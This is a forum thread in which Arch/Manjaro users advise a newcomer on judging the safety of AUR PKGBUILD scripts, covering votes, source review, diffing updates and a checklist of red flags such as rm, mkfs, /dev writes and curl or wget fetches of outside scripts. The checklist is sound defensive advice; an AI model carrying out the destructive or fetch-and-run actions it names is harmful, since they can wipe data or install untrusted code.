AUR PKGBUILDs

So AUR PKGBUILDs are shell scripts? For someone who doesn’t know any shell scripting how do you decide if it’s safe to install them?

For now all of the packages I need have a lot of votes so I assume they’re pretty safe.

I always read them because the Arch wiki advises to read them. But I only understand some of it if it’s simple enough.

Makes sense when they say Arch is not for the average user :confused:

This is like a rhetorical question I know. Still, I’d like your input. Thanks.

Depends on what’s inside and how code is built…
PKGBUILDs themselves are not the issue for security, but rest of the code can be in theory.

The only way to be 100% sure is to manually review code, i do that for example:

  1. Initially if i need something from AUR i manually check all files
  2. Then just diff on updates, to see changes!
1 Like

When you say manually review code do you mean package builds or the actual source code?

Actual source (well unless it’s something like outdated proprietary Nvidia drivers of course :sweat_smile:)

I have found so far that a kind of osmosis takes place, and after a few months you almost ‘get a feel’ for what the PKGBUILD is doing. If something makes you wonder, that’s what the forums are for!

Another thing that you might find is that there are options within the PKGBUILD for features that you might wish to include, or exclude from your build of the application. For instance, in the package conky-cairo, there are a number of ‘flags’ that control whether there is special handling for nVidia GPUs, and whether the Audacious music player includes special features too (among others). Normally these (if present) will be explained in lines that start with a # character… this denotes a comment, and does nothing except inform the reader of whatever it refers to.

The other thing you can do is “DuckDuckGo” (well - internet search) the name of the package you are considering - issues will often show up there if significant!

2 Likes

But it’s like having to learn so many different languages. I’m currently learning JS :woozy_face:

1 Like

You don’t - you stick to the repo packages. :wink:

3 Likes

Okay. So I’m still fine to use them then. If I need any clarification I will ask here for assistance. I will actually learn shell scripting but I don’t wanna learn multiple languages at the same time.

No worries, we all start somewhere.
But like i’ve said it’s the only 100% way to be sure, and not rely on someone else’s judgement…

I think you’ll find (over time) that computer languages are easier to learn than human ones! After all - there is a limited number of things they are trying to do - which helps…

2 Likes

Thanks guys I’m glad I asked. You guys are awesome. But still I should prolly go and ask on Arch forums too :rofl:

Edit: Relax just kidding

1 Like

Be aware (be VERY aware) that the answer may well include RTFM (read the “fine” manual) or at best a link to the Arch wiki… :grin: Try the questions here first!

2 Likes

I was kidding I should have put an /s there. I have never participated in a forum this much in my entire life. Well not participate I mean ask many questions. :grin:

Thinking of asking there gives me the same feeling that I get when I look down from 50 storey building.

@keybreak and @freebird54 have solved my problem but I can’t decide to choose the soluition :face_with_raised_eyebrow:

Hmm - undecided fits as name then?? :smile: Don’t think it matters…

2 Likes

Lmao! well when I first created this forum account it was meant to be a throwaway account. So I didn’t even use my real email address and had the username jonny (Just came to my head at the time). Now that I’ve spent time here I have decided to stay. But I haven’t decided on a username yet.

I was thinking of creating a new account and asking a mod to anonymize my account so the actualt content remains.

Edit: You are a mod! Reckon you can do it for me?

  • First of all, look up the package on aur.archlinux.org, see the comments, upvotes, popularity, name of the packager, etc… If it is not a popular package, be extra careful when inspecting the PKBUILD file. Look at the date the package was last updated. If it is fairly old, or updated by the same person, and people are using it, it’s almost certainly safe. If there is anything fishy going on, it will be removed from the AUR fairly quickly.

What to look for in the PKGBUILD file? You’ll have to learn some elementary shell scripting to understand what’s going on. This is easier than it sounds.

  • Inspect even the PKGBUILD files for completely trustworthy packages, just so you learn to recognise a good PKGBUILD file. When you see a dozen good PKGBUILD files and you understand what’s going on there, you’ll already have the feeling for anything that is out of place.

  • Look for anything obviously malicious, like rm, mv commands, any output redirection, any mention of /dev (like /dev/null, /dev/sda, /dev/zero, /dev/random), mkfs, any call to pacman, systemctl, anything that touches grub… stuff like that.

  • Look for any command that does stuff in your home directory. Typically, building and installing packages should not touch anything in the home directory. If you find something like that, be very suspicious and make sure you completely understand what that command does.

  • Look for anything that looks intentionally obfuscated. Anything that is written in an unclear way, with many semicolons, &&s and ||s, lots of brackets, sed, awk, etc… Typically, good PKGBUILDs contain very simple instructions.

  • Make sure the software comes from a trustworthy place, whether it’s a binary distribution or the source code. Check all the URLs in the script, make sure they are official pages for the software you’re installing. All URLs should be listed neatly in the beginning of the file. Look for any downloads of external scripts, with curl or wget, there should not be anything like that. Beware of random Github places.

  • Use common sense.

Also, when you install something from the AUR, make sure to upvote it on aur.archlinux.org, just to let everyone know it’s a good package. If you notice anything malicious, do not neglect to report it. Upvoting good packages and reporting bad ones is the easiest way to improve the AUR for everyone.

The AUR is one of the safest ways to install software, just because it is so transparent. But it does not tolerate just looking up the package in Pamac and clicking on the Build button, or doing yay package_name blindly. It requires that the user knows what’s going on. That’s why I recommend trying to build at least one package manually, to understand what’s going on, before using an AUR helper like pamac or yay.

yay has a nice feature that allows you to inspect a PKGBUILD file before installing, and to see the differences in the PKGBUILD file when updating a package from the AUR. Do not ignore this feature, it is very useful and will make your AUR usage much safer.

7 Likes

Thanks so much @Kresimir I now have somewhat a better understanding. I have built packages manually well on Arch you got no choice because you have to build yay.

I think I’m gonna learn at least basic shell scripting so I can make an informed decision. Also I will follow the advice given here by you and the others.

1 Like